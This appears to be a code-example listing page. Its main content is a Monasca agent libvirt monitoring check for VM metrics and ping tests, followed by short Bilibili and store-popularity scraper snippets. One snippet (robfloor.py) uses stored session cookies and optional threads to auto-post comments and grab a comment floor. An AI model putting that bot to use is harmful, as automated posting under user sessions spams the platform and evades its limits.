                if ((secgroup['tenant_id'] == instance.tenant_id
                     and secgroup['name'] == instance_secgroup['name'])):
                    for rule in secgroup['security_group_rules']:
                        if rule['protocol'] == 'icmp':
                            if ((not rule['remote_ip_prefix']
                                 or all_matching_cidrs(
                                     source_ip, [rule['remote_ip_prefix']]))):
                                return True

    def _update_instance_cache(self):
        """Collect instance_id, project_id, and AZ for all instance UUIDs
        """

        id_cache = {}
        flavor_cache = {}
        port_cache = None
        netns = None
        # Get a list of all instances from the Nova API
        session = keystone.get_session(**self.init_config)
        nova_client = n_client.Client(
            "2.1",
            session=session,
            endpoint_type=self.init_config.get("endpoint_type", "publicURL"),
            service_type="compute",
            region_name=self.init_config.get('region_name'),
            client_name='monasca-agent[libvirt]',
            client_version=ma_version.version_string)
        self._get_this_host_aggregate(nova_client)
        instances = nova_client.servers.list(search_opts={
            'all_tenants': 1,
            'host': self.hostname
        })
        # Lay the groundwork for fetching VM IPs and network namespaces
        if self.init_config.get('ping_check'):
            nu = neutron_client.Client(
                session=session,
                endpoint_type=self.init_config.get("endpoint_type",
                                                   "publicURL"),
                region_name=self.init_config.get('region_name'),
                client_name='monasca-agent[libvirt]',
                client_version=ma_version.version_string)
            port_cache = nu.list_ports()['ports']
            # Finding existing network namespaces is an indication that either
            # DVR agent_mode is enabled, or this is all-in-one (like devstack)
            netns = subprocess.check_output(['ip', 'netns', 'list'])
            if netns == '':
                self.log.warn(
                    "Unable to ping VMs, no network namespaces found." +
                    "Either no VMs are present, or routing is centralized.")

        #
        # Only make the keystone call to get the tenant list
        # if we are configured to publish tenant names.
        #
        tenants = []
        if self.init_config.get(
                'metadata') and 'tenant_name' in self.init_config.get(
                    'metadata'):
            tenants = utils.get_tenant_list(self.init_config, self.log)

        for instance in instances:
            instance_ports = []
            inst_name = instance.__getattr__('OS-EXT-SRV-ATTR:instance_name')
            inst_az = instance.__getattr__('OS-EXT-AZ:availability_zone')
            if instance.flavor['id'] in flavor_cache:
                inst_flavor = flavor_cache[instance.flavor['id']]
            else:
                try:
                    inst_flavor = nova_client.flavors.get(
                        instance.flavor['id'])
                except NotFound as e:
                    self.log.error('Skipping VM {}: {}'.format(inst_name, e))
                    continue
                flavor_cache[instance.flavor['id']] = inst_flavor
            if port_cache:
                instance_ports = [
                    p['id'] for p in port_cache
                    if p['device_id'] == instance.id
                ]
            id_cache[inst_name] = {
                'instance_uuid': instance.id,
                'hostname': instance.name,
                'zone': inst_az,
                'created': instance.created,
                'tenant_id': instance.tenant_id,
                'vcpus': inst_flavor.vcpus,
                'ram': inst_flavor.ram,
                'disk': inst_flavor.disk,
                'instance_ports': instance_ports
            }

            tenant_name = utils.get_tenant_name(tenants, instance.tenant_id)
            if tenant_name:
                id_cache[inst_name]['tenant_name'] = tenant_name

            for config_var in ['metadata', 'customer_metadata']:
                if self.init_config.get(config_var):
                    for metadata in self.init_config.get(config_var):
                        if instance.metadata.get(metadata):
                            id_cache[inst_name][metadata] = (
                                instance.metadata.get(metadata))

            # Build a list of pingable IP addresses attached to this VM and the
            # appropriate namespace, for use in ping tests
            if netns:
                secgroup_cache = nu.list_security_groups()['security_groups']
                self._build_ip_list(instance, inst_name, secgroup_cache,
                                    port_cache, id_cache)

        id_cache['last_update'] = int(time.time())

        # Write the updated cache
        try:
            with open(self.instance_cache_file, 'w') as cache_json:
                json.dump(id_cache, cache_json)
            if stat.S_IMODE(os.stat(
                    self.instance_cache_file).st_mode) != 0o600:
                os.chmod(self.instance_cache_file, 0o600)
        except IOError as e:
            self.log.error("Cannot write to {0}: {1}".format(
                self.instance_cache_file, e))

        return id_cache

    def _build_ip_list(self, instance, inst_name, secgroup_cache, port_cache,
                       id_cache):
        # Find all active fixed IPs for this VM, fetch each subnet_id
        for net in instance.addresses:
            for ip in instance.addresses[net]:
                if ip['OS-EXT-IPS:type'] == 'fixed' and ip['version'] == 4:
                    subnet_id = None
                    nsuuid = None
                    for port in port_cache:
                        if ((port['mac_address']
                             == ip['OS-EXT-IPS-MAC:mac_addr']
                             and port['tenant_id'] == instance.tenant_id
                             and port['status'] == 'ACTIVE')):
                            for fixed in port['fixed_ips']:
                                if fixed['ip_address'] == ip['addr']:
                                    subnet_id = fixed['subnet_id']
                                    break
                    # Use the subnet_id to find the router
                    ping_allowed = False
                    if subnet_id is not None:
                        for port in port_cache:
                            if ((port['device_owner'].startswith(
                                    'network:router_interface')
                                 and port['tenant_id'] == instance.tenant_id
                                 and port['status'] == 'ACTIVE')):
                                nsuuid = port['device_id']
                                for fixed in port['fixed_ips']:
                                    if fixed['subnet_id'] == subnet_id:
                                        # Validate security group
                                        if self._validate_secgroup(
                                                secgroup_cache, instance,
                                                fixed['ip_address']):
                                            ping_allowed = True
                                            break
                            if nsuuid is not None:
                                break
                    if nsuuid is not None and ping_allowed:
                        if 'network' not in id_cache[inst_name]:
                            id_cache[inst_name]['network'] = []
                        id_cache[inst_name]['network'].append({
                            'namespace':
                            "qrouter-{0}".format(nsuuid),
                            'ip':
                            ip['addr']
                        })
                    elif ping_allowed is False:
                        self.log.debug("ICMP disallowed for {0} on {1}".format(
                            inst_name, ip['addr']))

    def _load_instance_cache(self):
        """Load the cache map of instance names to Nova data.
           If the cache does not yet exist or is damaged, (re-)build it.
        """
        instance_cache = {}
        try:
            with open(self.instance_cache_file, 'r') as cache_json:
                instance_cache = json.load(cache_json)

                # Is it time to force a refresh of this data?
                if self.init_config.get('nova_refresh') is not None:
                    time_diff = time.time() - instance_cache['last_update']
                    if time_diff > self.init_config.get('nova_refresh'):
                        self._update_instance_cache()
        except (IOError, TypeError, ValueError):
            # The file may not exist yet, or is corrupt.  Rebuild it now.
            self.log.warning("Instance cache missing or corrupt, rebuilding.")
            instance_cache = self._update_instance_cache()
            pass

        return instance_cache

    def _load_metric_cache(self):
        """Load the counter metrics from the previous collection iteration
        """
        metric_cache = {}
        try:
            with open(self.metric_cache_file, 'r') as cache_json:
                metric_cache = json.load(cache_json)
        except (IOError, TypeError, ValueError):
            # The file may not exist yet.
            self.log.warning("Metrics cache missing or corrupt, rebuilding.")
            metric_cache = {}
            pass

        return metric_cache

    def _update_metric_cache(self, metric_cache, run_time):
        # Remove inactive VMs from the metric cache
        write_metric_cache = deepcopy(metric_cache)
        for instance in metric_cache:
            if (('cpu.time' not in metric_cache[instance]
                 or self._test_vm_probation(
                     time.strftime(
                         '%Y-%m-%dT%H:%M:%SZ',
                         time.gmtime(metric_cache[instance]['cpu.time']
                                     ['timestamp'] + run_time))) < 0)):
                self.log.info(
                    "Expiring old/empty {0} from cache".format(instance))
                del (write_metric_cache[instance])
        try:
            with open(self.metric_cache_file, 'w') as cache_json:
                json.dump(write_metric_cache, cache_json)
            if stat.S_IMODE(os.stat(self.metric_cache_file).st_mode) != 0o600:
                os.chmod(self.metric_cache_file, 0o600)
        except IOError as e:
            self.log.error("Cannot write to {0}: {1}".format(
                self.metric_cache_file, e))

    def _inspect_network(self, insp, inst, inst_name, instance_cache,
                         metric_cache, dims_customer, dims_operations):
        """Inspect network metrics for an instance"""
        for vnic in insp.inspect_vnics(inst):
            sample_time = time.time()
            vnic_dimensions = {'device': vnic[0].name}
            instance_ports = instance_cache.get(inst_name)['instance_ports']
            partial_port_id = vnic[0].name.split('tap')[1]
            # Multiple networked guest
            for port in instance_ports:
                if partial_port_id == port[:11]:
                    vnic_dimensions['port_id'] = port
                    break
            for metric in vnic[1]._fields:
                metric_name = "net.{0}".format(metric)
                if metric_name not in metric_cache[inst_name]:
                    metric_cache[inst_name][metric_name] = {}

                value = int(vnic[1].__getattribute__(metric))
                if vnic[0].name in metric_cache[inst_name][metric_name]:
                    last_update_time = metric_cache[inst_name][metric_name][
                        vnic[0].name]['timestamp']
                    time_diff = sample_time - float(last_update_time)
                    rate_value = self._calculate_rate(
                        value, metric_cache[inst_name][metric_name][
                            vnic[0].name]['value'], time_diff)
                    if rate_value < 0:
                        # Bad value, save current reading and skip
                        self.log.warn(
                            "Ignoring negative network sample for: "
                            "{0} new value: {1} old value: {2}".format(
                                inst_name, value, metric_cache[inst_name]
                                [metric_name][vnic[0].name]['value']))
                        metric_cache[inst_name][metric_name][vnic[0].name] = {
                            'timestamp': sample_time,
                            'value': value
                        }
                        continue
                    rate_name = self._get_metric_rate_name(metric_name)
                    rate_name = self._get_metric_name(rate_name)
                    if self.use_bits:
                        rate_value *= 8
                    # Customer
                    this_dimensions = vnic_dimensions.copy()
                    this_dimensions.update(dims_customer)
                    self.gauge(
                        rate_name,
                        rate_value,
                        dimensions=this_dimensions,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    # Operations (metric name prefixed with "vm."
                    this_dimensions = vnic_dimensions.copy()
                    this_dimensions.update(dims_operations)
                    self.gauge("vm.{0}".format(rate_name),
                               rate_value,
                               dimensions=this_dimensions)
                # Report raw counters.
                mapped_name = self._get_metric_name(metric_name)
                weighted_value = value
                if self.use_bits:
                    weighted_value = value * 8
                # Customer
                this_dimensions = vnic_dimensions.copy()
                this_dimensions.update(dims_customer)
                self.gauge(mapped_name,
                           weighted_value,
                           dimensions=this_dimensions,
                           delegated_tenant=instance_cache.get(inst_name)
                           ['tenant_id'],
                           hostname=instance_cache.get(inst_name)['hostname'])
                # Operations (metric name prefixed with "vm.")
                this_dimensions = vnic_dimensions.copy()
                this_dimensions.update(dims_operations)
                self.gauge("vm.{0}".format(mapped_name),
                           weighted_value,
                           dimensions=this_dimensions)
                # Save this metric to the cache
                metric_cache[inst_name][metric_name][vnic[0].name] = {
                    'timestamp': sample_time,
                    'value': value
                }

    def _inspect_cpu(self, insp, inst, inst_name, instance_cache, metric_cache,
                     dims_customer, dims_operations):
        """Inspect cpu metrics for an instance"""

        sample_time = float("{:9f}".format(time.time()))
        cpu_info = insp.inspect_cpus(inst)

        if 'cpu.time' in metric_cache[inst_name]:
            # I have a prior value, so calculate the raw_perc & push the metric
            cpu_diff = cpu_info.time - metric_cache[inst_name]['cpu.time'][
                'value']
            time_diff = sample_time - float(
                metric_cache[inst_name]['cpu.time']['timestamp'])
            # Convert time_diff to nanoseconds, and calculate percentage
            raw_perc = (cpu_diff / (time_diff * 1000000000)) * 100
            # Divide by the number of cores to normalize the percentage
            normalized_perc = (raw_perc / cpu_info.number)
            if raw_perc < 0:
                # Bad value, save current reading and skip
                self.log.warn(
                    "Ignoring negative CPU sample for: "
                    "{0} new cpu time: {1} old cpu time: {2}".format(
                        inst_name, cpu_info.time,
                        metric_cache[inst_name]['cpu.time']['value']))
                metric_cache[inst_name]['cpu.time'] = {
                    'timestamp': sample_time,
                    'value': cpu_info.time
                }
                return

            self.gauge(
                'cpu.utilization_perc',
                int(round(raw_perc, 0)),
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            self.gauge(
                'cpu.utilization_norm_perc',
                int(round(normalized_perc, 0)),
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            self.gauge('vm.cpu.utilization_perc',
                       int(round(raw_perc, 0)),
                       dimensions=dims_operations)
            self.gauge('vm.cpu.utilization_norm_perc',
                       int(round(normalized_perc, 0)),
                       dimensions=dims_operations)

            cpu_time_name = 'cpu.time_ns'
            # cpu.time_ns for owning tenant
            self.gauge(
                cpu_time_name,
                cpu_info.time,
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            # vm..cpu.time_ns for operations tenant
            self.gauge("vm.{0}".format(cpu_time_name),
                       cpu_info.time,
                       dimensions=dims_operations)
        metric_cache[inst_name]['cpu.time'] = {
            'timestamp': sample_time,
            'value': cpu_info.time
        }

    def _inspect_disks(self, insp, inst, inst_name, instance_cache,
                       metric_cache, dims_customer, dims_operations):
        """Inspect disk metrics for an instance"""

        metric_aggregate = {}
        for disk in insp.inspect_disks(inst):
            sample_time = time.time()
            disk_dimensions = {'device': disk[0].device}
            for metric in disk[1]._fields:
                metric_name = "io.{0}".format(metric.replace(
                    'requests', 'ops'))
                if metric_name not in metric_cache[inst_name]:
                    metric_cache[inst_name][metric_name] = {}

                value = int(disk[1].__getattribute__(metric))
                metric_aggregate[metric_name] = metric_aggregate.get(
                    metric_name, 0) + value
                if disk[0].device in metric_cache[inst_name][metric_name]:
                    cached_val = metric_cache[inst_name][metric_name][
                        disk[0].device]['value']
                    last_update_time = metric_cache[inst_name][metric_name][
                        disk[0].device]['timestamp']
                    time_diff = sample_time - float(last_update_time)
                    rate_value = self._calculate_rate(value, cached_val,
                                                      time_diff)
                    if rate_value < 0:
                        # Bad value, save current reading and skip
                        self.log.warn(
                            "Ignoring negative disk sample for: "
                            "{0} new value: {1} old value: {2}".format(
                                inst_name, value, cached_val))
                        metric_cache[inst_name][metric_name][
                            disk[0].device] = {
                                'timestamp': sample_time,
                                'value': value
                            }
                        continue
                    # Change the metric name to a rate, ie. "io.read_requests"
                    # gets converted to "io.read_ops_sec"
                    rate_name = "{0}_sec".format(
                        metric_name.replace('requests', 'ops'))
                    # Customer
                    this_dimensions = disk_dimensions.copy()
                    this_dimensions.update(dims_customer)
                    self.gauge(
                        rate_name,
                        rate_value,
                        dimensions=this_dimensions,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    self.gauge(
                        metric_name,
                        value,
                        dimensions=this_dimensions,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])

                    # Operations (metric name prefixed with "vm."
                    this_dimensions = disk_dimensions.copy()
                    this_dimensions.update(dims_operations)
                    self.gauge("vm.{0}".format(rate_name),
                               rate_value,
                               dimensions=this_dimensions)
                    self.gauge("vm.{0}".format(metric_name),
                               value,
                               dimensions=this_dimensions)
                # Save this metric to the cache
                metric_cache[inst_name][metric_name][disk[0].device] = {
                    'timestamp': sample_time,
                    'value': value
                }

        if self.init_config.get('vm_extended_disks_check_enable'):
            for metric in metric_aggregate:
                sample_time = time.time()
                rate_name = "{0}_total_sec".format(metric)
                if rate_name not in metric_cache[inst_name]:
                    metric_cache[inst_name][rate_name] = {}
                else:
                    last_update_time = metric_cache[inst_name][rate_name][
                        'timestamp']
                    time_diff = sample_time - float(last_update_time)
                    rate_value = self._calculate_rate(
                        metric_aggregate[metric],
                        metric_cache[inst_name][rate_name]['value'], time_diff)
                    if rate_value < 0:
                        # Bad value, save current reading and skip
                        self.log.warn(
                            "Ignoring negative disk sample for: "
                            "{0} new value: {1} old value: {2}".format(
                                inst_name, metric_aggregate[metric],
                                metric_cache[inst_name][rate_name]['value']))
                        metric_cache[inst_name][rate_name] = {
                            'timestamp': sample_time,
                            'value': metric_aggregate[metric]
                        }
                        continue
                    self.gauge(
                        rate_name,
                        rate_value,
                        dimensions=dims_customer,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    self.gauge("vm.{0}".format(rate_name),
                               rate_value,
                               dimensions=dims_operations)
                self.gauge("{0}_total".format(metric),
                           metric_aggregate[metric],
                           dimensions=dims_customer,
                           delegated_tenant=instance_cache.get(inst_name)
                           ['tenant_id'],
                           hostname=instance_cache.get(inst_name)['hostname'])
                self.gauge("vm.{0}_total".format(metric),
                           metric_aggregate[metric],
                           dimensions=dims_operations)
                # Save this metric to the cache
                metric_cache[inst_name][rate_name] = {
                    'timestamp': sample_time,
                    'value': metric_aggregate[metric]
                }

    def _inspect_disk_info(self, insp, inst, inst_name, instance_cache,
                           metric_cache, dims_customer, dims_operations):
        """Inspect disk metrics for an instance"""

        metric_aggregate = {}
        for disk in insp.inspect_disk_info(inst):
            disk_dimensions = {'device': disk[0].device}
            for metric in disk[1]._fields:
                metric_name = "disk.{0}".format(metric)
                value = int(disk[1].__getattribute__(metric))
                metric_aggregate[metric_name] = metric_aggregate.get(
                    metric_name, 0) + value
                this_dimensions = disk_dimensions.copy()
                this_dimensions.update(dims_customer)
                self.gauge(metric_name,
                           value,
                           dimensions=this_dimensions,
                           delegated_tenant=instance_cache.get(inst_name)
                           ['tenant_id'],
                           hostname=instance_cache.get(inst_name)['hostname'])
                # Operations (metric name prefixed with "vm."
                this_dimensions = disk_dimensions.copy()
                this_dimensions.update(dims_operations)
                self.gauge("vm.{0}".format(metric_name),
                           value,
                           dimensions=this_dimensions)

        for metric in metric_aggregate:
            self.gauge(
                "{0}_total".format(metric),
                metric_aggregate[metric],
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            self.gauge("vm.{0}_total".format(metric),
                       metric_aggregate[metric],
                       dimensions=dims_operations)

    def _inspect_state(self, insp, inst, inst_name, instance_cache,
                       dims_customer, dims_operations):
        """Look at the state of the instance, publish a metric using a
           user-friendly description in the 'detail' metadata, and return
           a status code (calibrated to UNIX status codes where 0 is OK)
           so that remaining metrics can be skipped if the VM is not OK
        """
        inst_state = inst.state()
        dom_status = inst_state[0] - 1
        metatag = None

        if inst_state[0] in DOM_STATES:
            metatag = {'detail': DOM_STATES[inst_state[0]]}
        # A VM being in SHUTOFF state may have many reasons, we try to be more specific here
        if inst_state[0] == libvirt.VIR_DOMAIN_SHUTOFF:
            if inst_state[1] in DOM_SHUTOFF_STATES:
                metatag = {'detail': DOM_SHUTOFF_STATES[inst_state[1]]}

        self.gauge('host_alive_status',
                   dom_status,
                   dimensions=dims_customer,
                   delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                   hostname=instance_cache.get(inst_name)['hostname'],
                   value_meta=metatag)
        self.gauge('vm.host_alive_status',
                   dom_status,
                   dimensions=dims_operations,
                   value_meta=metatag)

        return dom_status

    def prepare_run(self):
        """Check if it is time for measurements to be collected"""
        for name, collection in self._collect_intervals.items():
            if collection['period'] <= 0:
                continue

            time_since_last = datetime.now() - collection['last_collect']
            # Handle times that are really close to the collection period
            period_with_fudge_factor = timedelta(0, collection['period'] - 1,
                                                 500000)

            if time_since_last < period_with_fudge_factor:
                self.log.debug('Skipping {} collection for {} seconds'.format(
                    name, (collection['period'] - time_since_last.seconds)))
                collection['skip'] = True
            else:
                collection['skip'] = False
                collection['last_collect'] = datetime.now()

    def _run_ping(self, dims_customer, dims_operations, inst_name,
                  instance_cache, net):
        """Create a ping command and hand it off to the Thread Pool"""
        ping_cmd = self.init_config.get('ping_check').replace(
            'NAMESPACE', net['namespace']).split()
        ping_cmd.append(net['ip'])
        dims_customer_ip = dims_customer.copy()
        dims_operations_ip = dims_operations.copy()
        dims_customer_ip['ip'] = net['ip']
        dims_operations_ip['ip'] = net['ip']
        with open(os.devnull, "w") as fnull:
            try:
                self.log.debug("Running ping test: {0}".format(
                    ' '.join(ping_cmd)))
                res = subprocess.call(ping_cmd, stdout=fnull, stderr=fnull)
                tenant_id = instance_cache.get(inst_name)['tenant_id']
                hostname = instance_cache.get(inst_name)['hostname']
                return (res, dims_customer_ip, dims_operations_ip, tenant_id,
                        hostname)

            except Exception as e:
                self.log.exception(
                    "OS error running '{0}' failed".format(ping_cmd), e)
                raise e

    def _check_ping_results(self, ping_results):
        """Iterate through ping results and create measurements"""
        for result in ping_results:
            result.wait()
            # If it wasn't successful, a message was already logged in _run_ping
            if result.successful():
                (res, dims_customer_ip, dims_operations_ip, delegated_tenant,
                 hostname) = result.get()
                self.gauge('ping_status',
                           res,
                           dimensions=dims_customer_ip,
                           delegated_tenant=delegated_tenant,
                           hostname=hostname)
                self.gauge('vm.ping_status',
                           res,
                           dimensions=dims_operations_ip)

    def check(self, instance):
        """Gather VM metrics for each instance"""

        time_start = time.time()

        # Load metric cache
        metric_cache = self._load_metric_cache()

        # Load the nova-obtained instance data cache
        instance_cache = self._load_instance_cache()

        # Build dimensions for both the customer and for operations
        dims_base = self._set_dimensions(
            {
                'service': 'compute',
                'component': 'vm'
            }, instance)

        # Define aggregate gauges, gauge name to metric name
        agg_gauges = {
            'vcpus': 'nova.vm.cpu.total_allocated',
            'ram': 'nova.vm.mem.total_allocated_mb',
            'disk': 'nova.vm.disk.total_allocated_gb'
        }
        agg_values = {}
        for gauge in agg_gauges.keys():
            agg_values[gauge] = 0

        insp = inspector.get_hypervisor_inspector()
        updated_cache_this_time = False
        ping_results = []
        for inst in insp._get_connection().listAllDomains():
            # Verify that this instance exists in the cache.  Add if necessary.
            inst_name = inst.name()
            if inst_name not in instance_cache and not updated_cache_this_time:
                #
                # If we have multiple ghost VMs, we'll needlessly
                # update the instance cache.  Let's limit the cache
                # update to once per agent wakeup.
                #
                updated_cache_this_time = True
                instance_cache = self._update_instance_cache()

            # Build customer dimensions
            try:
                dims_customer = dims_base.copy()
                dims_customer['resource_id'] = instance_cache.get(
                    inst_name)['instance_uuid']
                dims_customer['zone'] = instance_cache.get(inst_name)['zone']
                # Add dimensions that would be helpful for operations
                dims_operations = dims_customer.copy()
                dims_operations['tenant_id'] = instance_cache.get(
                    inst_name)['tenant_id']
                dims_operations = self._update_dims_with_metadata(
                    instance_cache, inst_name, dims_operations)
                if self.init_config.get('customer_metadata'):
                    for metadata in self.init_config.get('customer_metadata'):
                        metadata_value = (
                            instance_cache.get(inst_name).get(metadata))
                        if metadata_value:
                            dims_customer[metadata] = metadata_value
                # Remove customer 'hostname' dimension, this will be replaced by the VM name
                del (dims_customer['hostname'])
                #
                # Add this hypervisor's host aggregate as a dimension if
                # configured to do so and we had a match on the regex for
                # this host.
                #
                if self._host_aggregate:
                    dims_operations['host_aggregate'] = self._host_aggregate
            except TypeError:
                # Nova can potentially get into a state where it can't see an
                # instance, but libvirt can.  This would cause TypeErrors as
                # incomplete data is cached for this instance.  Log and skip.
                self.log.error(
                    "{0} is not known to nova after instance cache update -- skipping this ghost VM."
                    .format(inst_name))
                continue

            # Accumulate aggregate data
            for gauge in agg_gauges:
                if gauge in instance_cache.get(inst_name):
                    agg_values[gauge] += instance_cache.get(inst_name)[gauge]

            # Skip instances created within the probation period
            vm_probation_remaining = self._test_vm_probation(
                instance_cache.get(inst_name)['created'])
            if (vm_probation_remaining >= 0):
                self.log.info(
                    "Libvirt: {0} in probation for another {1} seconds".format(
                        instance_cache.get(inst_name)['hostname'].encode(
                            'utf8'), vm_probation_remaining))
                continue

            # Skip further processing on VMs that are not in an active state
            if self._inspect_state(insp, inst, inst_name, instance_cache,
                                   dims_customer, dims_operations) != 0:
                continue

            # Skip the remainder of the checks if alive_only is True in the config
            if self.init_config.get('alive_only'):
                continue

            if inst_name not in metric_cache:
                metric_cache[inst_name] = {}

            if self.init_config.get('vm_cpu_check_enable'):
                self._inspect_cpu(insp, inst, inst_name, instance_cache,
                                  metric_cache, dims_customer, dims_operations)
            if not self._collect_intervals['disk']['skip']:
                if self.init_config.get('vm_disks_check_enable'):
                    self._inspect_disks(insp, inst, inst_name, instance_cache,
                                        metric_cache, dims_customer,
                                        dims_operations)
                if self.init_config.get('vm_extended_disks_check_enable'):
                    self._inspect_disk_info(insp, inst, inst_name,
                                            instance_cache, metric_cache,
                                            dims_customer, dims_operations)

            if not self._collect_intervals['vnic']['skip']:
                if self.init_config.get('vm_network_check_enable'):
                    self._inspect_network(insp, inst, inst_name,
                                          instance_cache, metric_cache,
                                          dims_customer, dims_operations)

            # Memory utilization
            # (req. balloon driver; Linux kernel param CONFIG_VIRTIO_BALLOON)
            try:
                mem_stats = inst.memoryStats()
                mem_metrics = {
                    'mem.free_mb':
                    float(mem_stats['unused']) / 1024,
                    'mem.swap_used_mb':
                    float(mem_stats['swap_out']) / 1024,
                    'mem.total_mb':
                    float(mem_stats['available']) / 1024,
                    'mem.used_mb':
                    float(mem_stats['available'] - mem_stats['unused']) / 1024,
                    'mem.free_perc':
                    float(mem_stats['unused']) /
                    float(mem_stats['available']) * 100
                }
                for name in mem_metrics:
                    self.gauge(
                        name,
                        mem_metrics[name],
                        dimensions=dims_customer,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    self.gauge("vm.{0}".format(name),
                               mem_metrics[name],
                               dimensions=dims_operations)
                memory_info = insp.inspect_memory_resident(inst)
                self.gauge('vm.mem.resident_mb',
                           float(memory_info.resident),
                           dimensions=dims_operations)
            except KeyError:
                self.log.debug(
                    "Balloon driver not active/available on guest {0} ({1})".
                    format(
                        inst_name,
                        instance_cache.get(inst_name)['hostname'].encode(
                            'utf8')))
            # Test instance's remote responsiveness (ping check) if possible
            if (self.init_config.get('vm_ping_check_enable')
                ) and self.init_config.get(
                    'ping_check') and 'network' in instance_cache.get(
                        inst_name):
                for net in instance_cache.get(inst_name)['network']:
                    ping_args = [
                        dims_customer, dims_operations, inst_name,
                        instance_cache, net
                    ]
                    ping_results.append(
                        self.pool.apply_async(self._run_ping, ping_args))

        # Save these metrics for the next collector invocation
        self._update_metric_cache(metric_cache,
                                  math.ceil(time.time() - time_start))

        # Publish aggregate metrics
        for gauge in agg_gauges:
            self.gauge(agg_gauges[gauge],
                       agg_values[gauge],
                       dimensions=dims_base)

        # Check results of ping tests
        self._check_ping_results(ping_results)

    def _calculate_rate(self, current_value, cache_value, time_diff):
        """Calculate rate based on current, cache value and time_diff."""
        try:
            rate_value = (current_value - cache_value) / time_diff
        except ZeroDivisionError as e:
            self.log.error("Time difference between current time and "
                           "last_update time is 0 . {0}".format(e))
            #
            # Being extra safe here, in case we divide by zero
            # just skip this reading with check below.
            #
            rate_value = -1
        return rate_value

    def _update_dims_with_metadata(self, instance_cache, inst_name,
                                   dim_operations):
        """Update operations dimensions with metadata."""
        dims = dim_operations
        if self.init_config.get('metadata'):
            for metadata in self.init_config.get('metadata'):
                if 'vm_name' == metadata:
                    metadata_value = (
                        instance_cache.get(inst_name).get('hostname'))
                else:
                    metadata_value = (
                        instance_cache.get(inst_name).get(metadata))
                if metadata_value:
                    dims[metadata] = metadata_value
        return dims

    def _get_this_host_aggregate(self, nova_client):
        """Determine the host aggregate for this hypervisor."""
        host_agg_cfg_re = self.init_config.get('host_aggregate_re', None)
        if not host_agg_cfg_re:
            return

        try:
            agg_re = re.compile(host_agg_cfg_re)
            aggs = nova_client.aggregates.list()
            for idx, agg in enumerate(aggs):
                if re.match(
                        agg_re,
                        aggs[idx].name) and self.hostname in aggs[idx].hosts:
                    self._host_aggregate = str(aggs[idx].name)
                    #
                    # Not expecting multiple matches, if we've got a match we're done.
                    #
                    break

        except Exception as e:
            msg = "Failed to list host aggregates, won't publish aggregate dimension: '{0}'"
            self.log.error(msg.format(e))

Example #47

0

Show file

File: robfloor.py Project: trysingtime/BILI

                        break
                    time.sleep(1)


cookies = read_cookie('./bilicookies')[0]
thread = 0


def task(cookies):
    bi = BILI(cookies)
    bi.run(av_num='6524145', floor=12, content="拿自己视频测试-7")
    # bi.run('8562550', floor=266)
    # print bi.get_comment_num(bi.get_newest())
    # bi.send_comment(bi.get_newest(),"什么")
    # bi.send_comment('6524145', '拿自己视频测试')
    # bi.run(floor=1)
    # bi.run()
    # bi.run('8562550',floor=270)


if thread == 1:
    threadnum = 10
    pool = ThreadPool(threadnum)
    for i in xrange(threadnum):
        result = pool.apply_async(task, (cookies, ))
        time.sleep(1)
    pool.close()
    pool.join()
else:
    task(cookies)

Example #48

0

Show file

    content = BeautifulSoup(response.text, "xml")
    # <d p="190.56399536133,5,25,15138834,1465868252,0,61dba469,1957402211">弹幕字幕</d>
    danmaku_raw = [x for x in content.select('i')[0].select('d')]
    danmaku_data = [{
        'aid': aid,
        'cid': cid,
        'time': float(x.attrs['p'].split(',')[0]),
        'mode': int(x.attrs['p'].split(',')[1]),
        'font': int(x.attrs['p'].split(',')[2]),
        'color': ("#%06x" % int(x.attrs['p'].split(',')[3], 10)).upper(),
        'date': float(x.attrs['p'].split(',')[4]),
        'pool': int(x.attrs['p'].split(',')[5]),
        'hash': x.attrs['p'].split(',')[6],
        'id': int(x.attrs['p'].split(',')[7]),
        'text': x.string
        } for x in danmaku_raw]
    DANMAKULIST.insert_many(danmaku_data)


if __name__ == '__main__':
    MULTIPOOL = ThreadPool(16)
    for avid in open('videoaid.csv', 'r'):
        params = {'aid': avid}
        resp = requests.get(url=API_PAGELIST, params=params)
        if resp.status_code == 200:
            pages = resp.json()
            for page in pages:
                MULTIPOOL.apply_async(getdanmaku, (avid, page['cid']))
    MULTIPOOL.close()
    MULTIPOOL.join()

Example #49

0

Show file

def update_current_popularity(addr_and_id, conn, doBackup, doLog, proxy,
                              num_processes):
    formatted_address_list = addr_and_id[
        0]  #formatted addresses of all open valid stores
    open_ids = addr_and_id[1][0]
    closed_ids = addr_and_id[1][1]
    print("LEN OPEN: ", len(open_ids), "LEN CLOSED: ", len(closed_ids))
    global BACKUP
    global LOG

    if ((num_processes is None) == True):
        print("without processes")
        #for ind in range(10):
        for ind in range(len(formatted_address_list)):
            place_data = lpt.get_populartimes_by_formatted_address(
                formatted_address_list[ind], proxy)
            log = update_row(conn, place_data, open_ids[ind])
            if doBackup == True:
                BACKUP.write(json.dumps(place_data, indent=4))
                BACKUP.write("\r\n")

            if doLog == True:
                for entry in log:
                    LOG.write(entry)
                    LOG.write("\r\n")

        cur = conn.cursor()
        #clean up closed stores
        cur.execute(
            "UPDATE map_store SET live_busyness=NULL WHERE id IN {closed}".
            format(closed=tuple(closed_ids)))
        cur.commit()

    else:
        pool = Pool(num_processes)
        place_data = {}
        #for ind in range(len(formatted_address_list)):
        for ind in range(len(formatted_address_list)):
            place_data[ind] = pool.apply_async(
                lpt.get_populartimes_by_formatted_address,
                args=(
                    formatted_address_list[ind],
                    proxy,
                ))

